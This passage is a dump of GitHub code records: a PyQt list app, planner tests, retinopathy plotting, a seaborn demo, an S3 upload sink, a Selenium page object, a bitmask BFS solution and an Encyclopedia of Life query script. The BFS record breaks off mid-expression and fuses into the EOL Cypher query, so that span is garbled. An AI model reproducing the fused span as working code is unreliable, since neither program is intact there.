+{"seq_id":"74157388582","text":"import sys\nfrom PyQt5.QtWidgets import QInputDialog, QLineEdit, QApplication, QMainWindow\nfrom listNancy import Ui_Dialog\n\nclass addForm(QMainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.ui.pushAdd.clicked.connect(self.addlisting)\n self.ui.pushEdit.clicked.connect(self.editlisting)\n self.ui.pushDelete.clicked.connect(self.dellisting)\n self.ui.pushDeleteAll.clicked.connect(self.delallist)\n\n def addlisting(self):\n self.ui.listWidget.addItem(self.ui.lineEdit.text())\n self.ui.lineEdit.setText('')\n self.ui.lineEdit.setFocus()\n\n def editlisting(self):\n row = self.ui.listWidget.currentRow()\n self.ui.listWidget.takeItem(row)\n text, okPressed = QInputDialog.getText(self, \"Get text\", \"New text:\", QLineEdit.Normal, \"\")\n if okPressed and text != '':\n self.ui.listWidget.insertItem(row, str(text))\n\n def dellisting(self):\n self.ui.listWidget.takeItem(self.ui.listWidget.currentRow())\n\n def delallist(self):\n self.ui.listWidget.clear()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n addApp = addForm()\n addApp.show()\n sys.exit(app.exec_())\n","repo_name":"rntafirenyika/Portfolio","sub_path":"6. BSC Computing - Unisa/Year 1/INF1511 Visual Programming 1 with Python/OneDrive_2023-09-12/INF1511 GUI/List example/callListNancy.pyw","file_name":"callListNancy.pyw","file_ext":"pyw","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"32386449493","text":"import numpy as np\nimport random\nimport tensorflow as tf\nimport unittest\nfrom itertools import product\n\nfrom planner import GridworldModel, BanditsModel\nfrom gridworld import Direction\nfrom gridworld import GridworldMdp, GridworldMdpWithDistanceFeatures\nfrom gridworld import NStateMdpGaussianFeatures\nfrom agents import OptimalAgent, ImmediateRewardAgent\n\n\nclass TestPlanner(unittest.TestCase):\n\n\n def test_gridworld_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(\n ['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = OptimalAgent(gamma=model.gamma, num_iters=num_iters)\n for i, proxy in enumerate(model.proxy_reward_space):\n for idx, val in zip(query, proxy):\n mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n continue\n x, y = state\n for action in mdp.get_actions(state):\n expected_q = agent.qvalue(state, action)\n action_num = Direction.get_number_from_direction(action)\n actual_q = qvals[y, x, action_num]\n # Using softmax, not max, so expect limited accuracy\n self.assertAlmostEqual(expected_q, actual_q, places=2)\n\n np.random.seed(1)\n random.seed(1)\n dim = 4\n grid = GridworldMdp.generate_random(8, 8, 0.1, dim)\n mdp = GridworldMdpWithDistanceFeatures(grid)\n mdp.rewards = np.random.randint(-9, 10, size=[dim])\n query = [0, 3]\n other_weights = mdp.rewards[1:3]\n # Use beta_planner = 1000 so that softmax is approximately max\n model = GridworldModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True,\n 8, 8, 25)\n check_model_equivalent(model, query, other_weights, mdp, 25)\n\n\n\n def test_bandits_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = ImmediateRewardAgent(gamma=model.gamma)\n for i, proxy in enumerate(model.proxy_reward_space):\n mdp.change_reward(proxy)\n\n # for idx, val in zip(query, proxy):\n # mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[:,i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n return\n expected_q = agent.qvalue(state, state)\n actual_q = qvals[state]\n self.assertAlmostEqual(expected_q, actual_q, places=5)\n\n dim = 5\n weights = np.random.randint(-9, 10, size=[dim])\n mdp = NStateMdpGaussianFeatures(\n num_states=7, rewards=weights, start_state=0,\n preterminal_states=[], feature_dim=dim, num_states_reachable=7)\n # query = [0, 2, 3]\n query = [0, 1, 2, 3, 4]\n # other_weights = np.array([weights[1], weights[4]])\n other_weights = np.zeros(0)\n model = BanditsModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True)\n check_model_equivalent(model, query, other_weights, mdp, 20)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"SoerenMind/Inverse_Reward_Design","sub_path":"Code/planner_test.py","file_name":"planner_test.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"28949398831","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\n#The code use to create the lower row of Figure 2\n#Plot the concept predictions for the FGADR testset for each DR level.\n\n#Inspect the FGADR test set instead:\nconceptPredictions_test = pd.read_csv('./SequentialModelOutput/RawDensenet121_conceptPredictions_FGADRTestset.csv',index_col = 'Unnamed: 0')\n\n#Counting number of positive predictions for MA\nMA_level0_predictions = 0\nMA_level1_predictions = 0\nMA_level2_predictions= 0\nMA_level3_predictions = 0\nMA_level4_predictions = 0\n#Repeat for HE:\nHE_level0_predictions = 0\nHE_level1_predictions = 0\nHE_level2_predictions= 0\nHE_level3_predictions = 0\nHE_level4_predictions = 0\n#Soft exudates:\nSoftEx_level0_predictions = 0\nSoftEx_level1_predictions = 0\nSoftEx_level2_predictions= 0\nSoftEx_level3_predictions = 0\nSoftEx_level4_predictions = 0\n#Hard exudates:\nHardEx_level0_predictions = 0\nHardEx_level1_predictions = 0\nHardEx_level2_predictions= 0\nHardEx_level3_predictions = 0\nHardEx_level4_predictions = 0\n#NV:\nNV_level0_predictions = 0\nNV_level1_predictions = 0\nNV_level2_predictions= 0\nNV_level3_predictions = 0\nNV_level4_predictions = 0\n#IRMA:\nIRMA_level0_predictions = 0\nIRMA_level1_predictions = 0\nIRMA_level2_predictions= 0\nIRMA_level3_predictions = 0\nIRMA_level4_predictions = 0\n\n#Count the number of observations for each DR level: \nlevel0_count = 0\nlevel1_count = 0\nlevel2_count = 0\nlevel3_count = 0\nlevel4_count = 0\nfor i in range(conceptPredictions_test.shape[0]):\n #Get the DR level\n dr_level = conceptPredictions_test.iloc[i,-1]\n print('Level of DR:',dr_level)\n #Get the raw concept predictions:\n concept_data = conceptPredictions_test.iloc[i,1]\n #Since these are (of unknown causes) interpreted as a string-list\n #We need to convert them to a proper list of float-values:\n concept_data = concept_data.strip('\"')\n concept_data = concept_data.strip('[]')\n concept_data = list(concept_data.split(','))\n concept_data = list(map(float,concept_data))\n print('Concept data:',concept_data)\n ma_concept = concept_data[0]\n he_concept = concept_data[1]\n softEx_concept = concept_data[2]\n hardEx_concept = concept_data[3]\n nv_concept = concept_data[4]\n irma_concept = concept_data[5]\n print('MA concept:',ma_concept)\n print('NV concept:',nv_concept)\n if dr_level == 0:\n level0_count+=1\n if ma_concept>=0:\n MA_level0_predictions+=1\n if he_concept>=0:\n HE_level0_predictions+=1\n if softEx_concept>=0:\n SoftEx_level0_predictions+=1\n if hardEx_concept>=0:\n HardEx_level0_predictions+=1\n if nv_concept>=0:\n NV_level0_predictions+=1\n if irma_concept>=0:\n IRMA_level0_predictions+=1\n elif dr_level ==1:\n level1_count+=1\n if ma_concept>=0:\n MA_level1_predictions+=1\n if he_concept>=0:\n HE_level1_predictions+=1\n if softEx_concept>=0:\n SoftEx_level1_predictions+=1\n if hardEx_concept>=0:\n HardEx_level1_predictions+=1\n if nv_concept>=0:\n NV_level1_predictions+=1\n if irma_concept>=0:\n IRMA_level1_predictions+=1\n elif dr_level == 2:\n level2_count+=1\n if ma_concept>=0:\n MA_level2_predictions+=1\n if he_concept>=0:\n HE_level2_predictions+=1\n if softEx_concept>=0:\n SoftEx_level2_predictions+=1\n if hardEx_concept>=0:\n HardEx_level2_predictions+=1\n if nv_concept>=0:\n NV_level2_predictions+=1\n if irma_concept>=0:\n IRMA_level2_predictions+=1\n elif dr_level == 3:\n level3_count+=1\n if ma_concept>=0:\n MA_level3_predictions+=1\n if he_concept>=0:\n 
HE_level3_predictions+=1\n if softEx_concept>=0:\n SoftEx_level3_predictions+=1\n if hardEx_concept>=0:\n HardEx_level3_predictions+=1\n if nv_concept>=0:\n NV_level3_predictions+=1\n if irma_concept>=0:\n IRMA_level3_predictions+=1\n elif dr_level == 4:\n level4_count+=1\n if ma_concept>=0:\n MA_level4_predictions+=1\n if he_concept>=0:\n HE_level4_predictions+=1\n if softEx_concept>=0:\n SoftEx_level4_predictions+=1\n if hardEx_concept>=0:\n HardEx_level4_predictions+=1\n if nv_concept>=0:\n NV_level4_predictions+=1\n if irma_concept>=0:\n IRMA_level4_predictions+=1\n \nprint('MA for DR level 0:', MA_level0_predictions)\nprint('HE for DR level 0:',HE_level0_predictions)\nprint('SoftEx for DR level 0:',SoftEx_level0_predictions)\nprint('HardEx for DR level 0:',HardEx_level0_predictions)\nprint('NV for DR level 0:',NV_level0_predictions)\nprint('IRMA for DR level 0:',IRMA_level0_predictions)\n\nprint('MA for DR level 1:', MA_level1_predictions)\nprint('HE for DR level 1:',HE_level1_predictions)\nprint('SoftEx for DR level 1:',SoftEx_level1_predictions)\nprint('HardEx for DR level 1:',HardEx_level1_predictions)\nprint('NV for DR level 1:',NV_level1_predictions)\nprint('IRMA for DR level 1:',IRMA_level1_predictions)\n\nprint('MA for DR level 2:', MA_level2_predictions)\nprint('HE for DR level 2:',HE_level2_predictions)\nprint('SoftEx for DR level 2:',SoftEx_level2_predictions)\nprint('HardEx for DR level 2:',HardEx_level2_predictions)\nprint('NV for DR level 2:',NV_level2_predictions)\nprint('IRMA for DR level 2:',IRMA_level2_predictions)\n\nprint('MA for DR level 3:', MA_level3_predictions)\nprint('HE for DR level 3:',HE_level3_predictions)\nprint('SoftEx for DR level 3:',SoftEx_level3_predictions)\nprint('HardEx for DR level 3:',HardEx_level3_predictions)\nprint('NV for DR level 3:',NV_level3_predictions)\nprint('IRMA for DR level 3:',IRMA_level3_predictions)\n\nprint('MA for DR level 4:', MA_level4_predictions)\nprint('HE for DR level 4:',HE_level4_predictions)\nprint('SoftEx for DR level 4:',SoftEx_level4_predictions)\nprint('HardEx for DR level 4:',HardEx_level4_predictions)\nprint('NV for DR level 4:',NV_level4_predictions)\nprint('IRMA for DR level 4:',IRMA_level4_predictions)\n\nprint('Total number of level 0 images:',level0_count)\nprint('Total number of level 1 images:',level1_count)\nprint('Total number of level 2 images:',level2_count)\nprint('Total number of level 3 images:',level3_count)\nprint('Total number of level 4 images:',level4_count)\n\n#plot barcharts for each DR level\nnum_concepts = 6\nbar_width = 0.35\n# create location for each bar. 
scale by an appropriate factor to ensure \n# the final plot doesn't have any parts overlapping\nindex = np.arange(num_concepts) * bar_width\nprint('Index:',index)\nmy_colors = mcolors.TABLEAU_COLORS\nnames = list(my_colors)\nprint('Colors to choose:',names)\nbar_x = []\nplot_conceptNames = ['MA','HE','EX','SE','IRMA','NV']\n#Divide by number of images (50 for each DR level) to get the percentage concept count ranging from 0 to 1\nlevel_0_conceptCounts = [MA_level0_predictions/level0_count,HE_level0_predictions/level0_count,HardEx_level0_predictions/level0_count,SoftEx_level0_predictions/level0_count,IRMA_level0_predictions/level0_count,NV_level0_predictions/level0_count]\nlevel_1_conceptCounts = [MA_level1_predictions/level1_count,HE_level1_predictions/level1_count,HardEx_level1_predictions/level1_count,SoftEx_level1_predictions/level1_count,IRMA_level1_predictions/level1_count,NV_level1_predictions/level1_count]\nlevel_2_conceptCounts = [MA_level2_predictions/level2_count,HE_level2_predictions/level2_count,HardEx_level2_predictions/level2_count,SoftEx_level2_predictions/level2_count,IRMA_level2_predictions/level2_count,NV_level2_predictions/level2_count]\nlevel_3_conceptCounts = [MA_level3_predictions/level3_count,HE_level3_predictions/level3_count,HardEx_level3_predictions/level3_count,SoftEx_level3_predictions/level3_count,IRMA_level3_predictions/level3_count,NV_level3_predictions/level3_count]\nlevel_4_conceptCounts = [MA_level4_predictions/level4_count,HE_level4_predictions/level4_count,HardEx_level4_predictions/level4_count,SoftEx_level4_predictions/level4_count,IRMA_level4_predictions/level4_count,NV_level4_predictions/level4_count]\nfor i in range(6):\n bar_x.append(i*bar_width)\n#Plotting the predicted concept counts for DR levels 1-4 \n#In order to compare with the TCAV scores\nfig, ax = plt.subplots(1,4, figsize=(32,8))\n\n#https://matplotlib.org/3.1.0/gallery/subplots_axes_and_figures/subplots_demo.html#sphx-glr-gallery-subplots-axes-and-figures-subplots-demo-py\n#DR level 1\nax[0].bar(bar_x, level_1_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[0].set_title('DR level 1',fontsize=32)\nax[0].set_xticks(bar_x)\nax[0].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[0].set_ylim((0,1.05))\n\n#DR level 2\nax[1].bar(bar_x, level_2_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[1].set_title('DR level 2',fontsize=32)\nax[1].set_xticks(bar_x)\nax[1].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[1].set_ylim((0,1.05))\n\n#DR level 3\nax[2].bar(bar_x, level_3_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[2].set_title('DR level 3',fontsize=32)\nax[2].set_xticks(bar_x)\nax[2].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[2].set_ylim((0,1.05))\n\n#DR level 4\nax[3].bar(bar_x, level_4_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[3].set_title('DR level 4',fontsize=32)\nax[3].set_xticks(bar_x)\nax[3].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[3].set_ylim((0,1.05))\n\nax[0].set_ylabel('Concept count',fontsize=32)\nax[0].set_yticklabels([0.0,0.2,0.4,0.6,0.8,1.0],fontsize=32)\n# Hide x labels and tick labels for top plots and y ticks for right 
plots.\nax[1].label_outer()\nax[2].label_outer()\nax[3].label_outer()\n\n\n#Shrink the space between the subplots:\nplt.subplots_adjust(wspace=0.1)\nplt.savefig('PlotBottleneckConceptCounts_FGADRTestset_subplots.png', bbox_inches = 'tight')\n","repo_name":"AndreaStoraas/ConceptExplanations_DR_grading","sub_path":"SequentialBottleneck_experiments/PlotConceptPredictions_FGADRTestset.py","file_name":"PlotConceptPredictions_FGADRTestset.py","file_ext":"py","file_size_in_byte":10311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
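The tallying script above maintains sixty near-identical counters and five repeated `if/elif` branches by hand. The same counts fit in one nested dictionary, which scales to any number of DR levels and concepts. A minimal sketch of that pattern; the column layout (predictions in column 1, DR level in the last column) and the concept ordering are assumptions taken from the record above:

```python
import pandas as pd

CONCEPTS = ["MA", "HE", "SoftEx", "HardEx", "NV", "IRMA"]  # order assumed from the record

def tally_concepts(df: pd.DataFrame) -> dict:
    """Return, per DR level, the fraction of images with each concept predicted present."""
    counts = {lvl: {c: 0 for c in CONCEPTS} for lvl in range(5)}
    totals = {lvl: 0 for lvl in range(5)}
    for _, row in df.iterrows():
        dr_level = int(row.iloc[-1])
        # Raw predictions arrive as a stringified list, e.g. '"[0.1, -0.3, ...]"'.
        preds = [float(v) for v in row.iloc[1].strip('"').strip("[]").split(",")]
        totals[dr_level] += 1
        for concept, value in zip(CONCEPTS, preds):
            if value >= 0:  # non-negative logit => concept predicted present
                counts[dr_level][concept] += 1
    return {lvl: {c: n / totals[lvl] for c, n in counts[lvl].items()}
            for lvl in counts if totals[lvl]}
```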
+{"seq_id":"37407092455","text":"# Demo code to show how to use pandas nad seaborn\r\nimport seaborn as sns\r\n\r\n\r\n# loads test data\r\niris_df = sns.load_dataset(\"iris\") # ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']\r\n\r\n\r\n\r\nprint(iris_df.columns) # Get your df columns\r\n\r\n# stores only the species\r\nspecies = iris_df[\"species\"]\r\nprint(species)\r\n\r\n# stores only the petal info\r\npetal_info = iris_df[[\"sepal_length\", \"sepal_width\", \"petal_length\", \"petal_width\"]]\r\nprint(petal_info)\r\n\r\n# stoes the petals smaller than 4.5\r\nsmall_sepal_length = iris_df[iris_df[\"sepal_length\"] < 4.5 ]\r\nprint(small_sepal_length)\r\n\r\n\r\n# stoes the mean for sepal width per species\r\nmean_sepal_width = iris_df.groupby(\"species\")[\"sepal_width\"].mean()\r\nprint(mean_sepal_width)\r\n\r\n\r\n# import matplotlib to display charts\r\nimport matplotlib.pyplot as plt\r\n\r\n# Shows the bar chart of sepal width average per species\r\nplt.figure()\r\n# passes data to display to the barplot method\r\n# sns.barplot(x=\"sepal_width\", y=\"species\", data=iris_df)\r\n\r\nsns.scatterplot(x=\"sepal_length\", y=\"sepal_width\", data=iris_df)\r\n\r\n# displays chart \r\nplt.show()\r\n\r\n# This will return a histogram\r\nsns.histplot(data=iris_df, x=\"sepal_width\") # Histogram\r\nplt.show()\r\n# This will return a boxplot\r\nsns.boxplot(y=iris_df[\"sepal_width\"])\r\n\r\n# Box plot using plt\r\n\r\nplt.boxplot(iris_df[\"sepal_width\"]) # Matplotlib ###\r\nplt.show()\r\n# Vioin plot\r\n\r\nsns.violinplot(y=iris_df[\"sepal_length\"])\r\nplt.show()\r\n# Countplot\r\n\r\nsns.countplot(x='species', data=iris_df)\r\nplt.show()\r\n\r\n# Pairplot\r\nsns.pairplot(iris_df);","repo_name":"HyperionDevBootcamps/C4_DS_lecture_examples","sub_path":"Lecture code/Data Analysis and Visualisation/data_visualisations_examples.py","file_name":"data_visualisations_examples.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"36"}
+{"seq_id":"70050077863","text":"import os\nimport tempfile\nfrom typing import Iterator, List, Optional, Tuple\n\nimport boto3\n\nfrom pipereport.base.sink import BaseSink\n\n\nclass S3Sink(BaseSink):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n client_args = {\"service_name\": \"s3\"}\n endpoint_url = kwargs.pop(\"endpoint_url\", None)\n if endpoint_url is not None:\n client_args[\"endpoint_url\"] = endpoint_url\n client_args[\"aws_access_key_id\"] = self.required_credential(\"aws_access_key_id\")\n client_args[\"aws_secret_access_key\"] = self.required_credential(\n \"aws_secret_access_key\"\n )\n self.client_args = client_args\n\n self.bucket = self.required_field(\"bucket\")\n\n self.session = None\n self.s3 = None\n\n def connect(self):\n self.session = boto3.session.Session()\n self.s3 = self.session.client(**self.client_args)\n\n def write_block(\n self,\n source_iterator: Iterator[Tuple],\n object_id: str,\n blocksize: int = -1,\n columns: Optional[List[str]] = None,\n sep: str = \"\\t\",\n ):\n self.telemetry.add_object(object_id, columns)\n with tempfile.TemporaryDirectory() as tmpdirname:\n cachefiledir = os.path.join(tmpdirname, os.path.dirname(object_id))\n if cachefiledir and not os.path.exists(cachefiledir):\n os.makedirs(cachefiledir)\n cachefile = os.path.join(tmpdirname, object_id)\n with open(cachefile, \"w\") as cache:\n block_written = 0\n for entry in source_iterator:\n cache.write(sep.join(entry) + \"\\n\")\n block_written += 1\n if block_written == blocksize:\n break\n self.telemetry.add_entries(object_id, block_written)\n self.s3.upload_file(cachefile, self.bucket, object_id)\n","repo_name":"enchantner/pipereport","sub_path":"pipereport/sink/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"37722790950","text":"'''\n商品浏览\n'''\n\nfrom common.base import Base\nfrom time import sleep\nurl = \"http://ecshop.itsoso.cn/\"\n\nclass Goodslist_Page(Base):\n \"\"\"封装表现层:制作定位器\"\"\"\n # 首页元素的定位\n first_page_loc = (\"link text\", \"首页\")\n send_loc = (\"name\", \"keywords\")\n search_loc = (\"value\", \"搜索\")\n\n\n def click_first(self):\n \"\"\"点击首页\"\"\"\n self.click(self.first_page_loc)\n\n def get_goods_text(self, locator):\n \"\"\"获取商品文本\"\"\"\n goods_elements = self.find_elements(locator)\n texts = []\n for goods_element in goods_elements:\n text = goods_element.text # 获取单个商品的文本\n texts.append(text)\n return texts\n\n def click_texts(self, locator1,locator2):\n \"\"\"\n\n :param locator1: 商品类的元素定位器\n :param locator2: 商品���表的定位器\n :return:\n \"\"\"\n # 取出商品类的所有文本\n texts = self.get_goods_text(locator1)\n for text in texts:\n good_loc = (\"link text\", text)\n self.click(good_loc)\n self.click_all_element(locator2)\n\n def get_goods_title(self, locator):\n \"\"\"获取商品标题\"\"\"\n goods_elements = self.find_elements(locator)\n # 获取商品标题\n titles = [] # 准备一个列表装商品标题\n for goods_element in goods_elements:\n # title就是表示元素的属性值\n title = goods_element.get_attribute(\"title\")\n titles.append(title)\n return titles\n\n def click_all_element(self, locator):\n \"\"\"点击所有元素\"\"\"\n titles = self.get_goods_title(locator)\n for title in titles:\n # 重新制作单个商品的定位器\n goods_loc = (\"css selector\", f\"a[title='{title}']\")\n self.click(goods_loc)\n self.back()\n self.next_page()\n\n def next_page(self):\n # 下一页的定位器\n next_loc = (\"link text\", \"下一页\")\n # 点击下一页\n # 判断有没有下一页的元素,有就点击元素,没有就返回首页\n while True:\n if self.displayed(next_loc):\n self.click(next_loc)\n else:\n self.click(self.first_page_loc)\n break\n\n\n def input_goods(self,text):\n \"\"\"输入搜索商品名\"\"\"\n self.send_keys(self.send_loc,text)\n\n def click_search(self):\n \"\"\"点击搜索按钮\"\"\"\n self.click(self.search_loc)\n\nif __name__ == '__main__':\n from common.base import open_browser\n\n driver = open_browser()\n goods = Goodslist_Page(driver) # 实例化login page\n goods.open_url(url) # 打开网址\n goods.click_first() # 点击首页\n categary_loc = (\"css selector\", \"div.cat-box>div.cat1>a\") # 商品类的定位器\n goods_loc = (\"css selector\", \"div.goods-title>a\") # 商品列表的定位器\n goods.click_texts(categary_loc, goods_loc) # 点击商品类\n","repo_name":"15008477526/-","sub_path":"web_aaaaaaaa/page/goods_list_page.py","file_name":"goods_list_page.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28923311211","text":"#1194. 달이 차오른다, 가자!\n\"\"\"\nBitmasking + BFS Technique \n\n상태공간의 정의 \n\ndists[i][j][key] = (i,j)인데 현재 status가 key인 것.\n\"\"\"\n\nimport sys \ninput = sys.stdin.readline \nfrom collections import deque \n\nN,M = map(int, input().rstrip().split())\n\nboards = []\nstart = (-1,-1)\nends = []\n\ndists = [[[-1] * M for _ in range(N)] for _ in range(64)]\n\nfor row in range(N):\n each_row = list(input().rstrip())\n boards.append(each_row)\n for col in range(M):\n if each_row[col] == \"0\" : \n start = (row,col)\n elif each_row[col] == \"1\" :\n ends.append((row,col))\n\n \n \n#방문 로직은 bfs 함수에서 검증하자!\n\"\"\"\n2500 * 64\n\n\n- RangeOut / Visit 여부 확인\n\n- Key가 있을 때 방문가능 여부 확인! (status check)\n\n\"\"\"\n\ns_row, s_col = start\n\ndists[0][s_row][s_col] = 0\ndeq = deque([(0,s_row,s_col)])\n\ndx = [-1,1,0,0]\ndy = [0,0,1,-1]\n\n\n\n\ndef bfs(deq, dist):\n while deq:\n key, cur_x, cur_y = deq.popleft()\n # print(f\"key:{key}, cur_x:{cur_x}, cur_y:{cur_y}, distance: {dists[key][cur_x][cur_y]}\")\n for i in range(4):\n nx = cur_x + dx[i] ; ny = cur_y + dy[i]\n #Rangeout, Visit, Wall 무시\n if nx<0 or ny<0 or nx>=N or ny>=M : continue \n if boards[nx][ny] == \"#\" : continue\n if dists[key][nx][ny]>=0: \n continue\n \n if boards[nx][ny].islower():\n order = ord(boards[nx][ny])-97\n new_key = (key | (1<(r:Resource), \\\n\t\t\t(t)-[:predicate]->(pred:Term) \\\n\t\tWHERE p.canonical = '\" + name + \"'\"\\\n\t\t\"OPTIONAL MATCH (t)-[:units_term]->(units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:object_term]->(obj:Term) \\\n\t\tOPTIONAL MATCH (t)-[:normal_units_term]->(normal_units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:sex_term]->(sex:Term) \\\n\t\tOPTIONAL MATCH (t)-[:lifestage_term]->(lifestage:Term) \\\n\t\tOPTIONAL MATCH (t)-[:statistical_method_term]->(stats:Term) \\\n\t\tRETURN p.canonical, pred.name, obj.name, t.literal, t.measurement, units.name, t.normal_measurement, normal_units.name, sex.name, lifestage.name, stats.name, stats.comment, r.resource_id, p.page_id, t.eol_pk, t.source \\\n\t\tLIMIT 500\"\n\ndata = {\"query\" : query,\n\t\t\"format\" : \"cypher\"}\n\n# Send api call\nr = requests.get(eol_base_url,\n\t\t\t\theaders = {\"accept\" : \"application/json\",\n\t\t\t\t\t\t\t\"authorization\" : \"JWT \" + eol_tok},\n\t\t\t\tparams = data)\n\nj = r.json()\n\n# Convert to df\ndf = pd.DataFrame(j[\"data\"])\ndf.columns = j[\"columns\"]\n\n# Drop rows where source is anage or iucn\ndf[\"t.source\"] = df[\"t.source\"].fillna(value = \"NA\")\ndf[\"Ignore_source\"] = [1 if any(s in x for s in[\"genomics.senescence\", \"iucn\"]) else 0 for x in df[\"t.source\"].tolist()]\n\ndf = df[df[\"Ignore_source\"] != 1]\n\ndf_datafields = df[\"pred.name\"].unique().tolist()\n\n# Extract relevant data\n# Habitat related data\nif \"habitat includes\" in df_datafields:\n\toutput[\"habitat\"][\"habitats\"] = df.loc[df[\"pred.name\"] == \"habitat includes\", \"obj.name\"].unique().tolist()\n\n# Pretty much countries of occurence but sum within county data too...\nif \"geographic distribution includes\" in df_datafields:\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"value\"] = df.loc[df[\"pred.name\"] == \"geographic distribution includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"unit\"] = \"Extant in country\"\n\n# Native range\nif \"native range includes\" in df_datafields:\n\toutput[\"habitat\"][\"native_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"native range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"native_range\"][\"unit\"] = 
\"Locations where the species is native\"\n\n# Introduced locations\nif \"introduced range includes\" in df_datafields:\n\toutput[\"habitat\"][\"introduced_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"introduced range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"introduced_range\"][\"unit\"] = \"Locations where the species has been introduced\"\n\n\nif \"body mass\" in df_datafields:\n\tif df.loc[(df[\"pred.name\"] == \"body mass\") &\n\t\t\t\t(df[\"lifestage.name\"].isnull()) &\n\t\t\t\t(df[\"stats.name\"] == \"max\"),:].shape[0] > 0:\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"t.normal_measurement\"].values[0]\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"normal_units.name\"].values[0]\n\n\nprint (json.dumps(output, indent=4, sort_keys=False))\n# May be more data, depends on species searched for...\n# Generally not much for parrots.\n\n# Not normally in reduced df\n# Population trend\n# if \"population trend\" in df_datafields:\n# \toutput[\"population\"][\"population_trend\"][\"value\"] = df.loc[df[\"pred.name\"] == \"population trend\", \"t.literal\"].values[0]\n\n# # Weights/bodymass??\n# if \"weight\" in df_datafields:\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"),:].shape[0] > 0:\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"t.normal_measurement\"].values[0]\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), 